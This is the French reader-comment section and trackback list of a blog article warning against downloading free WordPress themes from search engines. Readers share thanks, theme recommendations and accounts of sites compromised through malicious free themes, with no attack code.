
    MERCI

  66. Excellente lecture pour débuter sur WP, merci. J’en profite pour demander aux lecteurs présents leurs tuyaux sur une/des bonne(s) adresse(s) de templates payants. Je vais faire un site pour une structure d’accueil pour la petite enfance et n’étant ni graphiste ni codeur je voudrais partir d’un template éventuellement payant pour l’adapter à nos besoins. Et je n’ai rien trouvé de visuellement motivant dans les liens gratos proposés plus haut. D’avance merci.
    Nicolas

  67. Je suis toutnnouveau débarqué dans WorPress et je rame un peu pour trouver qlq chose d’adapté à ce que je veux faire. Mille mercis pour cette mise en garde, remarquablement bien documenté.
    Etienne.

  68. Merci pour cet article bien documenté. Tu conseilles les thème gratuits de woo themes, voici ce qui vient de m’arriver le mois dernier. Mon hébergeur me signale que des milliers de spams sont envoyés depuis un de mes sites et me conseille de voir ce qui se passe. Nous sommes samedi et je me dis que je verrai ça lundi. Dimanche ayant un peu de temps je vais voir et tous mes sites sont inaccessibles. 1and1 me prévient que les quantités de spam était tellles qu’il a du intervenir d’urgence. Je réponds au mail de one and one et je reçois le lendemain le verdict: un thème woo themes gratuit installé sur un de mes sites comportait une faille de sécurité utilisées par les spameurs.
    Cela faisait un moment déjà que je n’utilisais plus que des thèmes payant du type studiopress mais cela à encore renforcé ma tendance à n’avoir recours qu’à des thèmes payants et de sources sûres.

  69. J’ai cherché un thème WP pour mon blog, et en ait trouvé un sur un autre site proposant des thèmes gratuits. Eh bien, heureusement que j’avais lu votre article avant : un petit tour dans le functions.php et j’ai trouvé plein de eval(base64… ! Manifestement, des liens de pub dans le footer, « impossible » à retirer.
    Après quelques manipulations j’ai pu retirer tous les codes cachés et désactiver la mise en route des fonctions qu’ils commandaient, et donc virer les liens qui n’avaient rien à faire là.
    Merci beaucoup pour cet article très bien fait. Maintenant, je fais très attention quand je télécharge un thème WP. Merci !

  70. Merci !
    Superbe article.

  71. Il est évident qu’il est déconseillé de chercher ses thèmes via google, mais malheureusement tout le monde le fait. Moi même j’ai commencé comme ça…

  72. Merci pour cet article. Je ne connaissais pas du tout ces liens et encore moins cette histoire de base64…

    Ca va m’éviter des galères :)

  73. Même si ça fait longtemps que l’article est sorti, la méthode pour tester si le thème WordPress est vérolé reste une action primordiale à effectuer pour toute installation d’un thème WordPress gratuit.

  74. Salut à tous et merci infiniment pour cet article. Maintenant j’ai les réponses à mes interrogations. En utilisant ces s…..ries de thèmes gratos, notre blog a été piraté à 2 reprises. Non seulement le blog, mais toute la partie administrative de notre hébergeur.
    Alors soyez très très vigilant c’est un conseil que je vous donne.

  75. Merci beaucouuuuuuup
    Un article qui m’est très très utile

  76. Vraiment intéressant ! Je pense que je ne me passerai plus du TAC maintenant.

  77. Je te cite : »Décodeurs Si vous voulez inspecter un thème qui vous semble suspect, voici quelques ressources utiles (source): »

    Superbes tes liens!!! des que je fais un click droit sur « source » voilà ce que j’obtiens :

    Détails des infections
    URL: http://www.wordpress.org/support/topic/e
    processus: C:\Program Files (x86)\Mozilla Firefox\f…
    infection: PHP:Agent-IQ [Trj]

    Pour quelqun qui parle securité c’est mal barré…

  78. Wolf > Regarde le lien en question : quelqu’un a collé le code d’un virus JavaScript sur le forum lié. Aucun risque, donc, c’est juste ton navigateur/anti-virus qui prend peur un peu vite.

  79. Apres cette etude on peut en conclure que rien n’est gratuit et surtout payer un vrai theme c’est pas tres cher

  80. Une fois le thème nettoyé, que comment faire pour retirer les backdoors éventuellement rajouté par le hacker ?

  81. J’ai renvoyer ton article a mes clients qui on eu quelque surprise sur leurs site (Virus, Pub, Sécurité…). Apres avoir économiser quelques euro pour un Template qui coûte en moyenne entre 45/100 euro. Depuis sept ans je achète régulièrement des Templates pour mes clients chez http://www.templates-help.com et autre … et je n’est plus de surprise. l’extension TAC est mon premier utilitaire de wordpress pour vérifier mes sites, après les anti-hack. Xavier merci pour ton article…

  82. dominique gany 04/02/13 - 12:38

    pas mal comme analyse
    je partage
    merci à toi

  83. Exellent article. Merci pour le temps passé à faire ces recherches !

  84. Merci pour ton super article que je garde en favoris pour ne plus me planter de thème.

    Ben, oui comme beaucoup, j’ai pris un thème dans une sélection courante au début de la création de mon blog. J’ai du faire pas mal de modifications pour virer tous les codes impropres.

    Mais là je voudrais changer, je recherche des thèmes responsives avec slideshow de bonne qualité, gratuit de préférence, mais bon au pire, cela dépendra du prix, et pas 79$ comme j’ai pu voir O_o

    Aurais-tu des urls de sites autre que ceux fournis ? En responsive, je n’ai pas trouvé mon bonheur.

    J’aime bien ce thème http://www.s5themes.com/theme/boldy/ mais nulle part il est précisé s’il était responsive ou pas. Mais je doute, je l’ai testé rapidement sur mon blog et avec des outils de redimensionnement de page et … rien. O_o

  85. Bonjour,
    Je viens de commencer sur WP et heureusement que j’ai lu votre article avant de télécharger, par contre sur WP France je n’ai pas trouvé de templates plaisants, un peu vieillots je trouve
    Merci

  86. BraveDebutant 01/04/13 - 18:45

    Merci de ces avertissements. Moi qui étais en train d’examiner les catalogues de thèmes gratuits avant de lancer mon premier blog WP.

  87. Merci beaucoup pour cet article, très intéressant

  88. C’est un excellent article, merci pour l’info ! :)

  89. Intéressant, quelques commentaires :
    -base64 est un encodage pas un un chiffrement (et d’ailleurs on ne dit pas crypter pour un algorithme de chiffrement mais chiffré en français)
    -malicious en anglais se traduit par malveillant et non pas malicieux qui a pris un sens différent en français.

  90. Excellent article !!! Merci :)

  91. bonjour,

    magnifique article!
    du coup j’ai supprimé
    mon thème gratuit wp sur mon blog !

  92. Les thèmes payants ne sont pas excessivement chers et ça devrait être le premier réflexe d’un site à usage professionnel.

    Quelque dizaines d’euros et souvent moins de 30 € avec le cours avantageux face au dollar : sécurité, support et mises à niveau incluses dans ce prix, pourquoi se refuser un thème premium pour son activité ?

    Je pourrais utiliser le dernier thème par défaut de WordPress pour un de mes sites en production : il est formidable, mais on ne peut pas dire autant de tous ceux proposés sur WordPress.org.

    Je ne donne pas de noms, mais on peut retrouver sur le support WordPress.org ce que je pense de la fiabilité de certains développeurs.

  93. bonjour
    et bien c’est du propre, nous voila avertis, mais bon pas surprit quand même

    Par contre, je suppose que google est capable de voir les liens cachés (google n’aime pas semble-t-il)et certains devraient se poser la question, concernant son référencement, déjà pas facile en étant clean, mais en plus avec des casseroles pareilles.

    Mais, je pense que google avertit le webmaster par google analytics des éventuels liens cachés, il faut l’espérer

  94. wemoshey1 18/10/13 - 22:31

    Merci,bien content d’être tombé sur cette page en cherchant un thème WordPress gratuit sur un moteur de recherche….

    Merci bien j’était entrain de chercher un theme wordpress gratuit est voila j’ai trouver votre article ^^

  95. Encore une fois, on se rend compte que rien n’est vraiment « gratuit »… il y a toujours une contrepartie quelque part

  96. Bonjour,

    Et merci pour cette analyse poussée que ne fera jamais l’utilisateur lambda souvent novice ! maintenant on connait les risques encourus et on évitera

  97. Je débute dans l’utilisation de WP et votre approche me donne confiance de poursuivre avec cette outil de conception. Mes futurs sites n’en seront plus intéressants.

    Merci du beau travail.

Les commentaires sont fermés.

écrire un commentaire

49 rétroliens

  1. Tweets that mention Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche | WordPress Francophone -- Topsy.com
  2. Lectures de la semaine – Synapse Studio
  3. La Mare du Gof » Blog Archive » Actus Sécurité Grand public 2011 S04
  4. Faut-il faire confiance aux Logiciels Libres et Open-source ? - Internet Collaboratif
  5. Theme Wordpress par les moteurs de recherches attention aux codes malicieux | Laintimes
  6. Attention à la sécurité avec les templates Wordpress gratuits ! | Univers Network - Toute l’actualité sur le réseau et bien plus encore…
  7. Tweets that mention Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche | WordPress Francophone -- Topsy.com
  8. Attention aux thèmes gratuits Izee Media
  9. wp-popular.com » Blog Archive » Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche | WordPress Francophone
  10. Découvertes et fidélités de blogs le 14-02-11 | Pensée Libre
  11. Lu cette semaine (weekly) /  relation, transformation, partage
  12. L’hebdo WordPress : WPFR – WordPress 3.2 – Thèmes et extensions | WordPress Francophone
  13. L’hebdo WordPress : WPFR – WordPress 3.2 – Thèmes et extensions – Intégrateur développeur magento
  14. L’hebdo WordPress : WPFR – WordPress 3.2 – Thèmes et extensions
  15. Arrêtez de télécharger des thèmes Wordpress sur des sites louches | Citrotux
  16. La création d'un blog sous WordPress & mise en ligne | NoobTestBlog
  17. Theme WordPress : Attention aux thèmes poker gratuits ! « WPoker :: Wordpress + Poker
  18. Alexandre B donne le Theme Pro | Inteviews | Pour le web
  19. Rémi Gravelle » Blog Archive » Un blog, pourquoi, comment ?
  20. Les meilleurs liens web de la semaine 25 – 2011 | Florent Parcevaux
  21. Le malware guette également vos thèmes et vos plugins ! | @Aventure_Perso
  22. Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche | Tutorial sur Wordpress
  23. " Le weblogue change de peau" par Le weblogue de SeB
  24. Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche | Blogs | Scoop.it
  25. Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche | Logicamp | Scoop.it
  26. Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche | ZeeWebON
  27. Programmation | Pearltrees
  28. Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche | WordPress-Themes
  29. Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche
  30. Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche - WP-CLUB | Traduction de thèmes et extensions
  31. Geek | Pearltrees
  32. utilitaire | Pearltrees
  33. Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche | WordPress Francophone | Wordpress | Scoop.it
  34. Bien choisir son thème Wordpress | Blog Webdesign
  35. Voilà pourquoi il faut acheter un thème payant plutôt que gratuit - Bygga
  36. Cherche CM-graphiste-développeur-cracheur de feu | Les vingtenaires
  37. Sans lien de parenté #16 - DigiTold
  38. » Wordpress : Du code base64 dans timthumb.php Le blog de Quentin
  39. Le theme WordPress parfait pour son site et blog
  40. [Wordpress] Quelques conseils de sécurité pour ne pas se faire pirater son blog | Nicolas FORCET
  41. Digest_70 - atelier ooblik
  42. JM. Schreiber » Créer un site … et pourquoi utiliser Wordpress [Part1]
  43. Comment détecter et décoder les codes Base64 ? | Neadkolor.com Neadkolor.com
  44. Une journée à thèmes « Got2Be
  45. Comment bien choisir un thème WordPress en 20 points
  46. bantoozone | Thèmes Wordpress gratuits
  47. Récuperer des thèmes | Paul "Maverick" Girault
  48. Installer des thèmes Wordpress manuellement Com&Press
  49. Mon premier article | Projet iris traffic